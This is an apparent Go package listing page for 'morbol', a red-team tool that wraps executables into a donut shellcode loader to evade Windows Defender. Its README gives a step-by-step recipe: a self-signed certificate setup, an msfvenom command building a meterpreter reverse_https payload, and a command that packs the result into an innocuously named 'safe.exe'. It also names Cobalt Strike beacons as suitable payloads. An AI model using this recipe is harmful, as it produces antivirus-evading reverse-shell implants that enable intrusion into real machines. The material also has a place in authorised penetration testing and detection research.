morbol

command module

v0.0.0-...-0a5096a Latest Latest Go to latest Published: Nov 21, 2021 License: MIT Imports: 8 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/xct/morbol

Links

Open Source Insights

README ¶

Morbol

Wraps PE Files (PIE required) into a shellcode loader via donut. Note that this is meant for non interactive executeables that do not require arguments and do not generate any output that you want to obtain (e.g. won't work for Rubeus or Mimikatz, but does for msfvenom/cs beacons).

Please note that defender is now pretty good at detecting go loaders, so don't expect great results.

Setup

GO111MODULE=off go get golang.org/x/sys/windows
pip3 install donut-shellcode
sudo apt-get install upx

Usage

In my experience the only reliable way to evade defender with meterpreter is to use a reverse_https payload with a custom cert.

Modify /etc/ssl/openssl.cnf so that CipherString = DEFAULT
openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
set HandlerSSLCert on the server side listener

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=...  HandlerSSLCert=... -f exe  > msf.exe
python3 morbol.py msf.exe safe.exe

Credit

Heavily based on:

Documentation ¶

Overview ¶

+build linux,amd64,go1.15,!cgo

Source Files ¶

View all Source files

load.go

Directories ¶

Path	Synopsis
syscalls

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL